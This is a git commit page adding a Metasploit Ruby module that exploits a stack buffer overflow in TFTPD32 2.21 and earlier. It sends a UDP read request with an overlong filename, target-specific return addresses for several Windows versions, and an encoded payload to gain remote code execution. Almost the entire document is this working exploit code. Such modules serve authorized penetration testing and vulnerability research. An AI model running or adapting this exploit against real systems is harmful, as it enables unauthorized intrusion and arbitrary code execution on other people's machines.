Exploit from MC
git-svn-id: file:///home/svn/incoming/trunk@3653 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
049b71e236
commit
a8050a09ff
|
@ -0,0 +1,77 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::Tftp::Tftpd32_Long_Filename < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Udp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'TFTPD32 <= 2.21 Long Filename Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in TFTPD32 version 2.21
|
||||
and prior. By sending a request for an overly long file name
|
||||
to the tftpd32 server, a remote attacker could overflow a buffer and
|
||||
execute arbitrary code on the system.
|
||||
},
|
||||
'Author' => 'MC',
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['BID', '6199'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 250,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
['Windows NT 4.0 SP6a English', { 'Ret' => 0x77f9d463} ],
|
||||
['Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec663} ],
|
||||
['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0} ],
|
||||
['Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527} ],
|
||||
],
|
||||
|
||||
'Privileged' => true,
|
||||
|
||||
'DisclosureDate' => 'Nov 19 2002'
|
||||
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(69)
|
||||
], self)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect_udp
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
sploit =
|
||||
"\x00\x01" +
|
||||
Rex::Text.rand_text_english(120, payload_badchars) +
|
||||
"." +
|
||||
Rex::Text.rand_text_english(135, payload_badchars) +
|
||||
[target.ret].pack('V') +
|
||||
payload.encoded +
|
||||
"\x00"
|
||||
|
||||
udp_sock.put(sploit)
|
||||
|
||||
disconnect_udp
|
||||
end
|
||||
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue